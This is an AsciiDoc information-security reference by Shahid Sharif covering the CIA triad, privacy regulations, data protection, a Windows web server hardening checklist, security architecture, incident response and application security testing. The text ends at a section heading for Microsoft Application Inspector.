Information Security - A Comprehensive Reference.adoc

Information Security - A Comprehensive Reference

Table of Contents

• 1. Author
• 2. Overview
  • 2.1. Non-living Entities
  • 2.2. Living Entities
• 3. What is Data?
• 4. What is information security?
  • 4.1. Why is the triad important?
    • 4.1.1. Confidentiality
    • 4.1.2. Integrity
    • 4.1.3. Availability
• 5. Due Care & Due Deligence
• 6. Privacy
  • 6.1. GDPR
  • 6.2. CCPA
  • 6.3. PIPL
• 7. Data Protection
  • 7.1. Methodology
  • 7.2. Know your data
  • 7.3. Password Strength
• 8. Logical Security
• 9. Technical Security
• 10. Organizational Structure
  • 10.1. Security Organization
    • 10.1.1. Reporting to CEO (Ideal)
    • 10.1.2. Reporting to CFO
    • 10.1.3. Reporting to CIO
    • 10.1.4. Reporting to CTO
• 11. Information Security Program
  • 11.1. Security Policy
  • 11.2. Security Metrics
  • 11.3. Security Manual
  • 11.4. Security Standards
    • 11.4.1. Windows Web Server Hardening
  • 11.5. Security Guidelines
  • 11.6. Security Strategy
  • 11.7. Security Roadmap
  • 11.8. Security Architecture
    • 11.8.1. Network Architecture
    • 11.8.2. Application Architecture
    • 11.8.3. System Architecture
    • 11.8.4. Cloud Architecture
      • 11.8.4.1. AWS Security Reference Architecture
        • 11.8.4.1.1. AWS Security Services
  • 11.9. Security Development
  • 11.10. Security Operations
  • 11.11. Incident Response
• 12. Cryptography
• 13. Digital Identity
• 14. Training & Education
  • 14.1. Phishing
    • 14.1.1. GoPhish
• 15. Application Security
  • 15.1. Static Code Analysis (SAST)
    • 15.1.1. Operational Benefits
    • 15.1.2. Security Benefits
  • 15.2. Dynamic Code Analysis (DAST)
  • 15.3. Penetration Testing
    • 15.3.1. Microsoft Application Inspector
    • 15.3.2. PEpper
  • 15.4. Key & Secrets Management
• 16. System Security
• 17. Security-as-Code
• 18. Container Security
  • 18.1. Container Environment
  • 18.2. Container Scanners
  • 18.3. Container Monitoring
  • 18.4. Firewall
  • 18.5. Kubernetes
• 19. Vulnerability Management Program
  • 19.1. Deep vs Dark Web
  • 19.2. Pastebin
  • 19.3. Taxonomy
    • 19.3.1. Attacks
      • 19.3.1.1. Social Engineering Attacks
    • 19.3.2. Malware
  • 19.4. Vulnerability Assessment
  • 19.5. Penetration Testing
    • 19.5.1. Pentest Program
    • 19.5.2. Red team Assessment
      • 19.5.2.1. Red Team Resources
        • 19.5.2.1.1. Remote Access Trojan (RAT)
    • 19.5.3. Blue Team Assessment
      • 19.5.3.1. Powershell to test Windows Defender
    • 19.5.4. Purple Team
    • 19.5.5. Security Defense Modeling
      • 19.5.5.1. Cyber Kill Chain
    • 19.5.6. Methods
  • 19.6. Threat Modeling
    • 19.6.1. MITRE ATT&CK
      • 19.6.1.1. Relationship between Tactics & Techniques
    • 19.6.2. Threat Scoring and Databases
      • 19.6.2.1. CVSS
      • 19.6.2.2. NVD
    • 19.6.3. STRIDE
    • 19.6.4. DREAD
  • 19.7. Threat Intelligence
    • 19.7.1. Search Engines
    • 19.7.2. IoT
    • 19.7.3. Open Threat Exchange(OTX)
    • 19.7.4. Palo Alto Unit42
    • 19.7.5. Cisco Talos
    • 19.7.6. Sophos Labs
    • 19.7.7. STIX
    • 19.7.8. TAXII
    • 19.7.9. Tools
      • 19.7.9.1. MISP
  • 19.8. Threat Hunting
    • 19.8.1. Sysmon
    • 19.8.2. Detecting C2 over DNS
    • 19.8.3. RITA
    • 19.8.4. Tshark
    • 19.8.5. Zeek
    • 19.8.6. Reference Sites
  • 19.9. Threat Risk Assessments
  • 19.10. Bug Bounty / Crowsourced Security Platforms
• 20. DFIR-Digital Forensics & Incident Response
  • 20.1. Preparation
  • 20.2. During the Incident
  • 20.3. Playbooks
    • 20.3.1. Windows Persistence
• 21. Enterprise Architecture
  • 21.1. TOGAF
  • 21.2. SABSA
  • 21.3. Zachman
  • 21.4. DODAF
  • 21.5. MODAF
  • 21.6. Solution Architecture
• 22. Information Security Frameworks
  • 22.1. ISO2700x
  • 22.2. NIST Cyber Security Framework(CSF)
  • 22.3. Key Functions
  • 22.4. SOC2
  • 22.5. SOC2 vs ISO27001
• 23. Dev, Sec, Ops
  • 23.1. OWASP Top 10 App Sec Risks
  • 23.2. Real-Word Top 10 Attacks
• 24. Governance, Risk, & Compliance
  • 24.1. Lines of Defence
  • 24.2. Enterprise Risk Management
  • 24.3. IT Risk Management
  • 24.4. Integrated Risk Management
  • 24.5. Opertional Risk Management
  • 24.6. Enterprise GRC Management
  • 24.7. Vendor/Third-Party Risk Management
  • 24.8. Business Continuity
  • 24.9. Financial Audit
  • 24.10. Compliance
    • 24.10.1. Assesment Tools
• 25. Observability
• 26. Leadership
  • 26.1. Leader vs Manager
  • 26.2. Why do team members leave?
    • 26.2.1. Not cultivating the team member
    • 26.2.2. Not listening to experienced team members
    • 26.2.3. Teams are not aligned with the organizational goals
  • 26.3. Important qualities of a leader
• 27. Kali Reference
• 28. Business Resilience
  • 28.1. Business Continuity
    • 28.1.1. Conference Call Guidelines
    • 28.1.2. Remote Working Guidelines
  • 28.2. Disaster Recovery
• 29. Online Protection
  • 29.1. Marketing Organizations
  • 29.2. Service Providers
  • 29.3. What should I do to protect myself online?
• 30. Powershell Reference
• 31. Github Reference
  • 31.1. Adding a new repository to github.com
  • 31.2. Creating a local folder on your computer
  • 31.3. What to do after renaming your github username?
• 32. Cheat Sheets
• 33. Ethical Hacking References
  • 33.1. By Mayur Parmar
  • 33.2. By Pethuraj M
• 34. Terms Used
• References & Links

---

1. Author

Shahid Sharif

2. Overview

Everything in this world is centered around information, knowledge, which translates into a generic term data. This data can be about individuals, places, or things. Regardless of who or what it is about it is important that it is protected.

2.1. Non-living Entities

Data about non living entities when modified leads to mis-information and currently in the digital age our ability to provide the authenticity of that data is very difficult. If the source is trustworthy, then we deem it authentic, currently there are no mechanisms to ensure that the data has not been modified in between from when the trustworthy source released and to the time it got to you.

2.2. Living Entities

Data about living entities, especially us humans is very valuable. With the devices we carry, and use in our daily lives, we are constantly producing data, every hour, every second of our lives.

3. What is Data?

In the cosmos of data, understanding its various facets is key to unlocking its power and securing it. Here’s a snapshot of the essential terms that shape our data-driven narratives. 🌌

🌊 Data Lake: An expansive reservoir of raw, unstructured data. It’s the starting point, rich with possibility, awaiting exploration. Think of it as the primordial soup from which all data-driven insights emerge.

🛒 Datamart: A specialized 'boutique' within the larger 'market' of a Data Warehouse, focused on a specific business area. It’s where data gets personal, tailored to domain-specific queries.

🕸️ DATA mesh: An approach where data is decentralized, empowering individual teams with ownership and control. This mesh network ensures that data’s value is maximized through collective stewardship.

🚀 Data Pipelines: The dynamic flow of data, moving and transforming from raw to ready. It’s the journey that prepares data for action, making it accessible and meaningful.

🏛️ Data Warehouse: The structured archive where data is stored, organized, and ready for analysis. It’s the foundation that supports data-driven decision-making, a repository built for speed and scale.

🔎 Data Quality: The lifeblood of reliable analytics. Accuracy, consistency, and completeness define the trustworthiness of the data. Without quality, there’s no clarity.

👀 Data Observability: The window into the health of data systems. It’s about maintaining visibility to ensure reliability and performance, the behind-the-scenes hero ensuring everything runs smoothly.

These terms aren’t just jargon—they’re the building blocks of a data-centric world, and understanding them is your first step toward mastery. 🛠️

Data has to be protected in each of the above facets. Section below delves deeper into which aspects of data must be protected at all times.

4. What is information security?

The foundation of information security is based on three pillars also known as the triad

1. Confidentiality

2. Integrity

3. Availability

4.1. Why is the triad important?

What is the the topic of discussion, Information Security , there two key words here information and security, viz a viz securing information.

You have to condition yourself to always think about what protecting, the information. Once you get this concept the rest is easy.

Then think of how does this information move in the environment. Information of any type goes through follwoing lifecycle stages, also knows as CRUD:

1. Create

2. Read

3. Update

4. Delete

The sections below will build upon them.

4.1.1. Confidentiality

NIST defines "Confidentiality" as Preserving authorized restrictions on information access and disclosure, including means for protecting personal privacy and proprietary information.

4.1.2. Integrity

NIST defines "Integrity" as Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity.

4.1.3. Availability

NIST devines "Availability" as Ensuring timely and reliable access to and use of information.

5. Due Care & Due Deligence

Understanding the nuances between “due care” and “due diligence” is essential for effective risk management, especially in the complex domain of cybersecurity. While both terms are pivotal in establishing a robust security posture for risk mitigation, they differ significantly in their application and focus.

1. Due Care:

   1. In everyday life, due care refers to the habitual actions, policies, and procedures we employ to maintain safety and avoid risks. It’s about doing the right thing consistently.

   2. In a cybersecurity context, due care translates to the ongoing efforts an organization makes to keep its data and systems secure. This includes:

      1. Implementing and maintaining appropriate security measures.

      2. Regularly updating software to patch vulnerabilities.

      3. Ensuring that all employees are trained in security best practices.

2. Due Diligence:

   1. In a general sense, due diligence involves taking the necessary steps to avoid harm in a specific situation. It’s about doing the necessary homework.

   2. In the realm of cybersecurity, particularly within a regulatory framework, due diligence refers to the comprehensive process an organization undertakes to understand and manage the cyber risks associated with third-party partners, vendors, and acquisitions. This means:

      1. Thoroughly assessing the security posture of these external entities.

      2. Continuously monitoring their compliance.

      3. Ensuring they align with the organization’s cybersecurity standards.

3. Why Both Are Crucial:

   1. Due care and due diligence in cybersecurity are about proactive and reactive measures:

      1. Due care focuses on preventing security incidents through ongoing maintenance and good practices.

      2. Due diligence is about the investigative actions taken to ensure external parties do not introduce new risks into the organization.

In summary, both concepts are not only crucial in everyday risk management but become even more critical in a regulatory and compliance environment where the stakes are higher. Integrating these principles into your organization’s cybersecurity practices enhances your defensive posture and ensures compliance in an ever-evolving threat environment¹².

Sources

1. Due Care vs Due Diligence: What Is the Difference?. https://reciprocity.com/blog/due-care-vs-due-diligence-what-is-the-difference/.

2. What’s the Difference? Due Diligence vs Due Care in Cybersecurity …​. https://cyberinsight.co/what-is-due-diligence-vs-due-care-in-cyber-security/.

3. Cybersecurity – Due Diligence and Due Care. What are they?. https://northstarr-ltd.com/cybersecurity-due-diligence-and-due-care-what-are-they/.

4. An Overview of Due Diligence and Due Care in Cyber Security. https://library.mosse-institute.com/articles/2022/07/an-overview-of-due-diligence-and-due-care-in-cyber-security/an-overview-of-due-diligence-and-due-care-in-cyber-security.html.

6. Privacy

Centralization has very damaging impacts to a users privacy. Once the user has provided their information to an entity, they are at entities' mercy for data protection.

Certain states want to keep

Data that is being processed by the solution should care fully considered for:

1. Data protection: Based on data classification ensure data is protected in storage and in transit.

2. Data retention: Based on regulatory, and industry requirements, data should be retained for

3. Data access & update: Allow end users ability to access their data and modify it as required.

Governments across the world are responding to the global cyber security crisis by creating new regulations that govern the way companies handle and store valuable consumer data. This includes important information such as personal identifications, banking and credit card numbers, and purchase history.

6.1. GDPR

The European Union, in particular, has been a leader in this field. One of its pioneering efforts is the General Data Protection Regulations (GDPR) what was passed in 2016 and went into effect in Spring 2018. It impacts all companies that do business with European customers, regardless of where the company is located.

The GDPR requires that companies receive consent from consumers before processing data, collect and store data anonymously, and notify customers when their information has potentially been breached. It also requires large businesses to appoint a data privacy protection officer to oversee implementation of the regulations.

6.2. CCPA

Furthermore, while the U.S. federal government has yet to create a set of strong data privacy protections, several states have drawn up their legislation, including Hawaii, Massachusetts, Maryland, Mississippi, New Mexico, and Washington.

However, the most important of these regulations come from California, the largest state in the country by population with nearly 40 million residents. The California Consumer Privacy Act (CCPA) goes into effect on January 1, 2020, and governs the way companies must store and secure data.

CCPA allows consumers to demand crucial information about their personal data held by corporations.

When requested, businesses must inform consumers about the type of personal data they possess, provide them with specific personal information collected in the previous year, and allow customers to request that their information not be shared with third parties. Companies will also have to delete customer data when requested.

6.3. PIPL

On 1 November 2021, the new Personal Information Protection Law (PIPL) of the People’s Republic of China will enter into force. This law, adopted on 20 August 2021, is an omnibus privacy law that will apply to all organisations doing business in China or targeting people in China, and has major compliance consequences similar to GDPR.

7. Data Protection

7.1. Methodology

1. Define what to classify

2. Define where to classify

3. Define who applies classification

4. Define conditions

5. Assign labels to users and groups

6. Define Access rights

7. Create classification policies

8. Test Classification policies

9. Deploy classification policies

10. Monitor and accelerate remediation

7.2. Know your data

1. Where is my sensitive data located?

2. What are the risky activities happening in my organization – files shared externally, across 1st and 3rd party apps?

3. I need to comply with a new regulation? Where is my PII data located & where is it being generated?

4. How do I control data sprawl and build a strategy for ROT before I bring data

5. How do I see activity around classification and labeling across retention and sensitivity labels once they have been used across governance and retention outcomes?

6. How do I monitor ongoing risk around label activity?

7.3. Password Strength

Brute force password cracking - the importance of using a long password with a mix of uppercase, lowercase and special characters.

Assuming an attacker has a reasonably fast connection and PC, the table is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities – or gets shut down trying.

Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters – like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.

via Dan Williams (https://www.linkedin.com/in/ACoAAACDV6ABaDOtrduFQ5p-c5qgSka1HHTseAY/?lipi=urn%3Ali%3Apage%3Ad_flagship3_feed%3BxdsE5HnqTDulyw2QOn9mCw%3D%3D)

8. Logical Security

Logical controls are about physical aspects of the information protection. The computer system is housed in a building in a particular area. Depending on the sensitivity of the information various mechanisms are put in place like:

• Fenced building perimeter

• Gates at the entry and exit points

• Guards manning those gates to ensure that only authorized individuals are allowed through the gates

Now working through the layers just like peeling an onion. You have gone through the first layer the perimeter. Now once in the perimeter it has to be ensured:

• Ensuring protections are in place to prevent vehicles damaging the building via direct impacts

• Split the building into zones with different levels of access levels for the personnel and this can be gated & guarded area

• Ensure computer room is in the middle of the building without any window access

• The computer room can be split into zones depending on the sensitivity of the information

• Access to these zones can be gated and guarded

• Assets within these zone would be placed in cabinets that are again secured via lock and key

9. Technical Security

Now that we have addressed the physical security aspects Once inside the computer room, this is where information security starts to take shape. All the computers in the computer room will need to be accessed by the users. People with different levels of access would be physically separated into specific areas. For instance Super users were in a different physical space than regular users.

With the advent of networking,TCP/IP, and better access control mechanisms in operating systems that requirement to physically segregate users started to diminish.

That requirement to physically segregate users with different levels of access via gates and guards moved to the network and operating system level and this is where information security started to take a foot hold.

Applications that operated on top of the operating system implemented fine grained access mechanisms for the users.

The gates and guards started getting replaced by electronic locks with pin pads and cameras. Whereby to prove that you were authorized to access an area, you would have the PIN to the door which you would use to get access.

The PIN pads later got replaced by card access, where you had to scan your card to enter an area.

As you can see a lot of Physical Security controls are also moving into information security space whereby the cameras that are recording and the recording management software, the card access system and access management are all managed by applications that are operating on top of an operating system running on a computer system.

Enter Information Security, which at the most fundamental level is the basis for:

• Information Technology Security

• System Security

  • Network Security

  • Application Security

    • Database Security

• Cyber Security

This book will cover the various aspects of implementing an Information Security Program at an organization of any size. You don’t have to be a huge organization to have an information security program. If you are in business you are collecting, storing, and transmitting all kinds of information and it important that you know how to ensure that information is protected at all times. If it is not then maybe your business might be at risk.

10. Organizational Structure

You can have the best security organization, however, if you do not have security embedded in Project Delivery, Vendor Management, Change Management, and Operations then it becomes to enforce security.

10.1. Security Organization

For Security to be taken seriously a security organization is mandatory, while the non operational team would report to the CISO, the operational structure can be based on two models:

• Centralized

• Distributed

In centralized operational model, all aspects of security operations are within the security organization, such as:

• User provisioning/de-provisioning

• Security Information & Event Management (SIEM)

• Security Operations Center

• Incident Response

• Firewall & Network Operations

In a decentralized operations model, the above aspects are managed by different business units with the security organization providing oversight in form of GRC.

10.1.1. Reporting to CEO (Ideal)

10.1.2. Reporting to CFO

10.1.3. Reporting to CIO

10.1.4. Reporting to CTO

11. Information Security Program

11.1. Security Policy

Before any solution is implemented, a security policy must be created to ensure all the industry, regulatory, and other compliance requirements are documented. This document will provide the security requirements to ensure the deployment is secure. All the requirements should be very high level without delving into implementation details.

11.2. Security Metrics

To ensure the success of a information security program, following metrics should be tracked over at least a year.

Most Important ones at the top

• Asset Count

  • Access Points

  • Cameras

  • Domains

  • Sub-domains

  • Servers

  • Laptops

  • Desktops

  • Switches

  • Routers

  • Firewalls

  • Printers

• AD Asset Counts

  • User accounts

  • Application Accounts

  • Computer Accounts

  • Groups

  • Mailboxes

• Patching

  • OS Patching

  • Application Patching

• Active Threat Metrics

  • Mean Time To Detect Threats

  • Mean Time To Respond To Threats

  • Malware Blocked

  • Malware Allowed

  • Phishing Blocked

  • Phishing Allowed

  • DDOS Attacks Prevented

11.3. Security Manual

This document goes into details on the how the security policy requirements must be implemented. It can be one document, or multiple depending on the size of implementation.

11.4. Security Standards

Standards are mandatory requirements that must be adhered to. Some of the standards to be considered are:

11.4.1. Windows Web Server Hardening

Services

• Unnecessary Windows services are disabled.

• Services are running with least-privileged accounts.

• FTP, SMTP, and NNTP services are disabled if they are not required.

• Telnet service is disabled.

Protocols

• WebDAV is disabled if not used by the application OR it is secured if it is required.

• TCP/IP stack is hardened

• NetBIOS and SMB are disabled (closes ports 137, 138, 139, and 445).

Accounts

• Unused accounts are removed from the server.

• Guest account is disabled.

• IUSR_MACHINE account is disabled if it is not used by the application.

• If your applications require anonymous access, a custom least-privileged anonymous account is created.

• The anonymous account does not have write access to Web content directories and cannot execute command-line tools. Strong account and password policies are enforced for the server.

• Remote logons are restricted. (The “Access this computer from the network” user-right is removed from the Everyone group.)

• Accounts are not shared among administrators.

• Null sessions (anonymous logons) are disabled.

• Approval is required for account delegation.

• Users and administrators do not share accounts.

• No more than two accounts exist in the Administrators group.

• Administrators are required to log on locally OR the remote administration solution is secure.

Files and Directories

• Files and directories are contained on NTFS volumes Web site content is located on a non-system NTFS volume.

• Log files are located on a non-system NTFS volume and not on the same volume where the Web site content resides.

• The Everyone group is restricted (no access to \WINNT\system32 or Web directories).

• Web site root directory has denied write ACE for anonymous Internet accounts.

• Content directories have deny write ACE for anonymous Internet accounts.

• Remote administration application is removed

• Resource kit tools, utilities, and SDKs are removed.

• Sample applications are removed

Shares

• All unnecessary shares are removed (including default administration shares).

• Access to required shares is restricted (the Everyone group does not have access).

• Administrative shares (C$ and Admin$) are removed if they are not required (Microsoft Management Server (SMS) and Microsoft Operations Manager (MOM) require these shares).

Ports

• Internet-facing interfaces are restricted to port 80 (and 443 if SSL is used)

• Intranet traffic is encrypted (for example, with SSL) or restricted if you do not have a secure data center infrastructure.

Registry

• Remote registry access is restricted.

• SAM is secured (HKLM\System\CurrentControlSet\Control\LSA\NoLMHash).

Auditing and Logging

• Failed logon attempts are audited.

• IIS log files are relocated and secured.

• Log files are configured with an appropriate size depending on the application security requirement.

• Log files are regularly archived and analyzed.

• Access to the Metabase.bin file is audited.

• IIS is configured for W3C Extended log file format auditing.

Server Certificates

• Ensure certificate date ranges are valid.

• Only use certificates for their intended purpose (For example, the server certificate is not used for e-mail).

• Ensure the certificate’s public key is valid, all the way to a trusted root authority.

• Confirm that the certificate has not been revoked.

11.5. Security Guidelines

11.6. Security Strategy

11.7. Security Roadmap

Roadmap is the how the security strategy will be implemented. The roadmap would become the Cyber Security Program which will contain multiple projrects over multiple years to realize the security strategy

11.8. Security Architecture

Security architecture refers to a unified security design that addresses the necessities and potential risks in a specific scenario or environment. It outlines when and where to apply security controls. This design process is generally reproducible². In essence, security architecture is the strategic alignment of systems, policies, and technologies to safeguard IT and business assets from cyber threats. It ensures that cybersecurity aligns with the unique business goals and risk management profile of an organization³⁴.

At its core, security architecture involves:

1. Physical and Logical Representations: It encompasses a set of physical and logical security-relevant representations (views) of system architecture. These convey how the system is partitioned into security domains and utilize security-relevant elements to enforce security policies within and between these domains based on data protection requirements¹.

2. Alignment with Business Goals: A well-designed security architecture aligns with the organization’s mission and strategic plans. It describes the structure and behavior of security processes, information security systems, personnel, and organizational sub-units³.

3. Executable Security Requirements: By translating business requirements into executable security requirements, security architecture ensures that the organization remains resilient against cyber threats⁴.

Remember, security architecture is not a one-size-fits-all solution; it adapts to the unique context and needs of each organization.

Sources

1. What is Security Architecture? - Definition from Techopedia. https://www.techopedia.com/definition/72/security-architecture.

2. What Is Security Architecture? - Palo Alto Networks. https://www.paloaltonetworks.com/cyberpedia/what-is-security-architecture.

3. Security Architecture: What it is, Benefits and Frameworks. https://www.threatintelligence.com/blog/security-architecture.

4. security architecture - Glossary | CSRC. https://csrc.nist.gov/glossary/term/security_architecture.

11.8.1. Network Architecture

Network architecture refers to the way network devices and services are structured to serve the connectivity needs of client devices. Let’s break it down:

1. Components of Network Architecture:

   • Network Devices: These include switches and routers that facilitate data flow.

   • Services: Examples include DHCP (Dynamic Host Configuration Protocol) for IP address assignment and DNS (Domain Name System) for translating domain names to IP addresses.

   • Client Devices: These comprise end-user devices (like laptops, tablets, and smartphones), servers, and smart things (such as IoT devices).

2. Types of Enterprise Networks:

   • Access Networks: Designed for campuses and branches, they bring users and devices onboard (e.g., connecting employees within an office building).

   • Data Center Networks: Connect servers hosting data and applications, making them available to users.

   • Wide-Area Networks (WANs): Link users to applications, even over long distances (e.g., connecting hospital workers to health applications).

3. Security Considerations:

   • Different networks face unique security threats that they need to guard against.

   • Network architectures must adapt to serve the exacting needs brought on by technology advancements and digital transformation initiatives.

4. Modern Approaches:

   • Intent-Based Networking (IBN): Sets up the network based on desired outcomes, automates operations, analyzes performance, enhances security, and integrates with business processes.

   • Controller-Led Networks: Controllers simplify operations, automate configurations, and monitor devices continuously.

In summary, network architecture ensures efficient connectivity, security, and adaptability in the digital age¹.

Sources

1. What Is Network Architecture? - Cisco. https://www.cisco.com/c/en/us/solutions/enterprise-networks/what-is-network-architecture.html.

2. Network architecture - Wikipedia. https://en.wikipedia.org/wiki/Network_architecture.

3. What is Network Architecture? - Definition from Techopedia. https://www.techopedia.com/definition/8549/network-architecture.

11.8.2. Application Architecture

Application architecture refers to the patterns and techniques used in designing and building an application. It provides a roadmap and best practices to ensure that the resulting application is well-structured and meets its intended goals¹.

Here are some key points about application architecture:

1. Design Patterns and Techniques:

   • Patterns: These are repeatable solutions to common problems. They help address specific challenges during application development.

   • Techniques: Techniques describe how to implement patterns effectively. They guide decisions related to components, data flow, and interactions.

2. Front-End and Back-End Services:

   • Front-End Development: Focuses on the user experience of the application. It deals with user interfaces, responsiveness, and interactions.

   • Back-End Development: Concerned with providing access to data, services, and existing systems that make the application work. It handles business logic, databases, and APIs.

3. Programming Languages:

   • Choosing a programming language is an essential step. Popular languages include:

   • JavaScript: Widely used for web application development.

   • Python, Ruby, Java, Swift, and others: Each has its strengths and use cases.

4. Monolith vs. Microservices:

   • Monolith: Historically, applications were written as a single unit of code (monolith). All components shared the same resources and memory space.

   • Modern Architecture: Applications are now more loosely coupled, using microservices and APIs. Microservices allow modular development and scalability.

5. Cloud-Native Development:

   • Cloud-native development accelerates building and optimizing applications across private, public, and hybrid clouds.

   • It leverages microservices, containers, and automation for consistent management.

6. Choosing an Architecture:

   • Start by determining your strategic goals.

   • Design an architecture that aligns with your objectives rather than fitting an application into a predefined structure.

In summary, application architecture provides guidance for creating well-structured, efficient, and adaptable applications that meet business needs¹.

Sources

1. What is an application architecture? - Red Hat. https://www.redhat.com/en/topics/cloud-native-apps/what-is-an-application-architecture.

2. Applications architecture - Wikipedia. https://en.wikipedia.org/wiki/Applications_architecture.

11.8.3. System Architecture

System architecture refers to the conceptual model that defines the structure, behavior, and different perspectives of a system. Let’s explore it in more detail:

1. Definition:

   • A system architecture provides a formal description and representation of a system.

   • It organizes the system’s components and sub-systems, ensuring they work together cohesively.

2. Key Aspects:

   • Structure: System architecture defines the fundamental organization of a system. This includes the arrangement of components, their relationships, and their interactions with the environment.

   • Behavior: It describes how the system behaves, including its functionality, data flow, and interactions.

   • Views: System architecture provides different perspectives (views) of the system, such as functional, hardware, software, and human interaction views.

3. Components of System Architecture:

   • Hardware Components: These include servers, network devices, storage, and other physical infrastructure.

   • Software Components: These encompass applications, databases, middleware, and operating systems.

   • Documentation: Descriptions, diagrams, and specifications that capture the system’s design.

   • Human Interaction: How users interact with the system, including interfaces and user experience.

4. Purpose and Importance:

   • Design Guidance: System architecture guides the design process, ensuring that the system meets its intended goals.

   • Scalability and Adaptability: A well-designed architecture allows for future growth and changes.

   • Communication: It serves as a common language for stakeholders, developers, and engineers.

In summary, system architecture is a critical aspect of designing robust, efficient, and reliable systems, whether they are software applications, hardware devices, or complex integrated solutions¹²³.

Source: Conversation with Bing, 5/12/2024 . Systems architecture - Wikipedia. https://en.wikipedia.org/wiki/Systems_architecture. . System Architecture Definition - SEBoK. https://sebokwiki.org/wiki/System_Architecture_Definition. . What is Systems Architecture? - reqi.io. https://reqi.io/articles/what-is-systems-architecture. . System Architecture - Detailed Explanation - InterviewBit. https://www.interviewbit.com/blog/system-architecture/.

11.8.4. Cloud Architecture

11.8.4.1. AWS Security Reference Architecture

The AWS Security Reference Architecture

AWS Security Reference Architecture Examples Github Repository

Figure 1. "AWS Security Reference Architecure

11.8.4.1.1. AWS Security Services

Figure 2. AWS Security Services

11.9. Security Development

11.10. Security Operations

A robust mechanism must be instituted to ensure all systems are baselined and any deviation from the baseline is reported to the SOC for action. All critical components must be monitored at all times, and SIEM leveraged to discover anomalies and ensure they are addressed in a timely fashion.

11.11. Incident Response

Cybersecurity incident response refers to an organization’s processes and technologies for detecting, analyzing, and responding to cyberthreats, security breaches, or cyberattacks. Let’s explore the key aspects of an effective incident response approach:

1. Incident Response Phases:

   1. Preparation: Establish an incident response plan (IRP) that outlines how different types of cyberattacks should be identified, contained, and resolved. Identify key personnel, communication channels, and procedures.

   2. Detection and Analysis: Continuously monitor for security incidents. When an incident occurs, analyze its impact, scope, and severity. Understand the adversary’s tactics and techniques.

   3. Containment, Eradication, and Recovery:

      1. Containment: Isolate affected systems to prevent further damage.

      2. Eradication: Remove the threat and address vulnerabilities.

      3. Recovery: Restore affected systems, data, and services.

   4. Post-Incident Activity: Conduct a thorough review of the incident. Document lessons learned, update the IRP, and improve security controls.

2. Security Incidents vs. Events:

   • A security incident (or security event) is any breach that threatens the confidentiality, integrity, or availability of an organization’s information systems or sensitive data.

   • Incidents can range from intentional cyberattacks by hackers to unintentional policy violations by authorized users.

3. Common Security Incidents:

   1. Ransomware: Malware that locks up data or devices until a ransom is paid.

   2. Phishing and Social Engineering: Manipulative messages that deceive recipients into sharing sensitive information or taking damaging actions.

   3. DDoS Attacks: Distributed Denial-of-Service attacks overwhelm systems with traffic.

   4. Supply Chain Attacks: Target vulnerabilities in third-party software or services.

   5. Insider Threats: Unauthorized actions by legitimate users.

4. Benefits of Incident Response:

   1. Faster Detection and Containment: A well-prepared incident response team can detect and contain threats promptly.

   2. Reduced Impact: Effective response minimizes business disruption, lost revenue, and regulatory fines.

   3. Improved Resilience: Organizations with tested IRPs recover faster from incidents.

Remember that incident response is a continuous process. Regularly test and update your IRP to stay prepared and resilient against evolving cyber threats¹⁴⁵.

Sources

1. A Strategic Response to Cyber Incidents in Health Care: Becoming Prepared and Resilient. https://www.beckershospitalreview.com/cybersecurity/a-strategic-response-to-cyber-incidents-in-health-care-becoming-prepared-and-resilient.html.

2. What is Incident Response? | IBM. https://www.ibm.com/topics/incident-response.

3. What is incident response? – CyberProof. https://www.cyberproof.com/cyber-101/incident-response/.

4. ITS Holding a Free Online Webinar on Incident Response. https://news.marketersmedia.com/its-holding-a-free-online-webinar-on-incident-response/89128847.

5. Armor Unveils a Disruptive Approach to Managed Detection and Response. https://finance.yahoo.com/news/armor-unveils-disruptive-approach-managed-150000081.html.

6. How to Create a Cybersecurity Incident Response Plan - Hyperproof. https://hyperproof.io/resource/cybersecurity-incident-response-plan/.

12. Cryptography

Cryptographic Blinding

13. Digital Identity

Digital Identity is a bridge that connects the physical and the digital world. You can call them Personna’s in a digital world.

Cost of financial intermediation is been going up due to regulation.

According to Europol we are spending about $20b to intercept 0.15% of the fraudulent flows of money.

14. Training & Education

14.1. Phishing

14.1.1. GoPhish

An opensource toolkit to generate phishing campaigns for organizations to test their employee phishing knowledge Link: https://github.com/gophish/gophish/releases/

15. Application Security

Application Security is one of the key areas that need a lot of attention. A successful application security program ensures that during the lifecycle of the code development and deployment following mechanisms are considered:

1. SAST - Static Application Code Analysis

2. DAST - Dynamic Application Code Analysis

followed by at least an annual Penetration Testing exercise, where a human being attempts to break the application using various mechanisms that only a human being can manage.

SAST & DAST complement each other, one does not replace the other.

15.1. Static Code Analysis (SAST)

Static application security testing (SAST), or static analysis, is a testing methodology that analyzes source code to find security vulnerabilities that make your organization’s applications susceptible to attack. SAST scans an application before the code is compiled. It’s also known as white box testing.

15.1.1. Operational Benefits

SAST takes place very early in the software development life cycle (SDLC) as it does not require a working application and can take place without code being executed. It helps developers identify vulnerabilities in the initial stages of development and quickly resolve issues without breaking builds or passing on vulnerabilities to the final release of the application.

SAST tools give developers real-time feedback as they code, helping them fix issues before they pass the code to the next phase of the SDLC. This prevents security-related issues from being considered an afterthought. SAST tools also provide graphical representations of the issues found, from source to sink. These help you navigate the code easier. Some tools point out the exact location of vulnerabilities and highlight the risky code. Tools can also provide in-depth guidance on how to fix issues and the best place in the code to fix them, without requiring deep security domain expertise.

Developers can also create the customized reports they need with SAST tools; these reports can be exported offline and tracked using dashboards. Tracking all the security issues reported by the tool in an organized way can help developers remediate these issues promptly and release applications with minimal problems. This process contributes to the creation of a secure SDLC.

It’s important to note that SAST tools must be run on the application on a regular basis, such as during daily/monthly builds, every time code is checked in, or during a code release.

15.1.2. Security Benefits

Developers dramatically outnumber security staff. It can be challenging for an organization to find the resources to perform code reviews on even a fraction of its applications. A key strength of SAST tools is the ability to analyze 100% of the codebase. Additionally, they are much faster than manual secure code reviews performed by humans. These tools can scan millions of lines of code in a matter of minutes. SAST tools automatically identify critical vulnerabilities—such as buffer overflows, SQL injection, cross-site scripting, and others—with high confidence. Thus, integrating static analysis into the SDLC can yield dramatic results in the overall quality of the code developed.

15.2. Dynamic Code Analysis (DAST)

15.3. Penetration Testing

This testing has to be done by a human being to mimic a hacker performing the activities as they normally would.

15.3.1. Microsoft Application Inspector

